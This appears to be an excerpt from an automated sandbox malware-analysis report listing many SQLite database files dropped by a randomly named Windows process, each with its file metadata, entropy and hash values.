                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
